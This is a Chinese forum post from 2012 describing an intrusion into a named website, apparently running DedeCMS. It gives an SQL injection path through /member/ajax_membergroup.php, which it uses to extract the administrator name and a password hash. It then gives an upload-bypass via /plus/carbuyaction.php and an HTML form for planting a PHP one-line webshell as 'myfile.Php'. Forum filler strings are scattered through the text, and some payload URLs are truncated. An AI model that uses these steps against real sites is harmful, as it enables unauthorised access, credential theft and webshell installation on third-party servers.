①注入漏洞。
! b( M' X7 b5 [- x这站 http://www.political-security.com/
3 t& f2 Q6 _/ g$ e, Z首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
3 D# K0 b& A1 D, x# R4 S, G9 t% lwww.political-security.com/data/mysql_error_trace.inc 爆后台
% o/ f8 q" T j( N$ i然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。& T1 T1 a3 [* S
然后写上语句 : C6 }' e: z1 t: h
查看管理员帐号
/ A; u. C5 b# Z. f2 M% }* vhttp://www.political-security.co ... &membergroup=@`
. T9 }' j2 Z+ P5 t2 N9 z) O: p0 x" s2 L! ~
admin + x4 x$ E: v2 A+ E" U/ ^( g
3 S! r- ~" E" U# f5 ^" {' K查看管理员密码
1 s: O0 W( m1 d# _! K7 S4 D http://www.political-security.co ... &membergroup=@`
2 [# T, H) a; s; Q& e" ~, P. Y, C
9 b( g+ i0 ?" I# d) e3 E3 t/ N: [8d29b1ef9f8c5a5af429
- @& @) [' D; j5 B0 H! K
9 \/ P% h0 y# m8 u查看管理员密码
4 e& O7 _5 i, B1 h0 {& A+ Z9 o2 A2 n$ j+ W6 u$ L0 L0 s
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD58 k7 j: S4 m. f$ o7 o
* r T, U% d( Y/ L- \ |, d8d2: ]- p% p {4 m& M
9b1ef9f8c5a5af42
* U" G# A: n, {4 a90 v' Z$ h' n. w' O
8 }* Y" j" f6 T3 y1 |cmd5没解出来 只好测试第二个方法
! U/ ~ F/ Q1 h5 S8 J
, M$ R6 i! R* ]2 t
+ `/ o( ~3 `4 U5 U. P0 O②上传漏洞:
+ B: v y: x! V* }( q' z
6 z0 R% G5 x9 x0 \只要登陆会员中心,然后访问页面链接
, J) B( U: _ C* H# c" ]“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”* \1 ]4 ^/ c$ g
# c4 |% q5 a% f4 m" S6 n
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”: C n0 u2 I, g
* r7 Y" e9 |( G7 e5 A于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm$ g: {* v2 z$ l; O2 Q
" k( S4 @' ?: h( R( M- l7 [
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; y3 K& g4 X( q$ n/ v0 R" O或者
2 n6 j4 s1 ^2 t. n4 q即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对